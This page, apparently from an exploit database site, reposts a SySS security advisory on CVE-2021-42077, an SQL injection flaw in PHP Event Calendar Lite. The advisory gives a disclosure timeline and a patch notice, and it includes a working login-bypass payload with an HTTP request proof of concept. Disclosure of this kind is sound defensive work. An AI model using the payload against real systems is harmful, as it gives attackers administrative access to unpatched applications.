0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PHP Event Calendar Lite Edition SQL Injection Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Product: PHP Event Calendar Manufacturer: Kayson Group Ltd. Affected Version(s): PHP Event Calendar Lite edition Tested Version(s): PHP Event Calendar Lite edition Vulnerability Type: SQL injection (CWE-89) Risk Level: High Solution Status: Closed Manufacturer Notification: 2021-08-09 Solution Date: 2021-09-03 Public Disclosure: 2021-11-04 CVE Reference: CVE-2021-42077 Authors of Advisory: Erik Steltzner, SySS GmbH Maurizio Ruchay, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: PHP Event Calendar is a multi-user web application designed to manage and publish calendar events. The manufacturer describes the product as follows (see [1] and [2]): "PHP Event Calendar features day, week, month, year, agenda, and resource views. It includes built-in reminder support so you can deliver full-featured event scheduling management systems in the shortest possible time." "PHP Event Calendar is a out-of-box web calendar/scheduler solution. It will run on web servers that support PHP 5.3 and higher." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Due to improper validation, the application is vulnerable to SQL injection attacks. For example, the following SQL statement can be used as a username during the login process to bypass the authentication: ' OR '1' = '1' # This vulnerability cannot only be exploited to bypass the login. It can also be used to execute SQL statements directly on the database, allowing an adversary in some cases to completely compromise the database system. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following request shows how it is possible for an adversary to bypass the login mask with the SQL statement "' OR '1' = '1' #": ~~~ Request: POST /server/ajax/user_manager.php HTTP/1.1 Host: <rhost> [...snip...] username='+OR+'1'+%3D+'1'+%23&password=password Response: HTTP/1.1 200 OK Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxx [...snip...] Connection: close success#Welcome ' OR '1' = '1' # ~~~ The web application accepts the request and the adversary is now logged in into the app with admin privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to a recent version of PHP Event Calendar. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2021-07-29: Vulnerability discovered 2021-08-09: Vulnerability reported to manufacturer 2021-09-03: Patch released by manufacturer 2021-11-04: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product Website for PHP Event Calendar https://phpeventcalendar.com/ [2] Documentation Website for PHP Event Calendar https://phpeventcalendar.com/documentation/ [3] SySS Security Advisory SYSS-2021-048 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-048.txt [4] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [5] PHP Prepared Statements: https://www.php.net/manual/de/mysqli.quickstart.prepared-statements.php # 0day.today [2024-12-25] #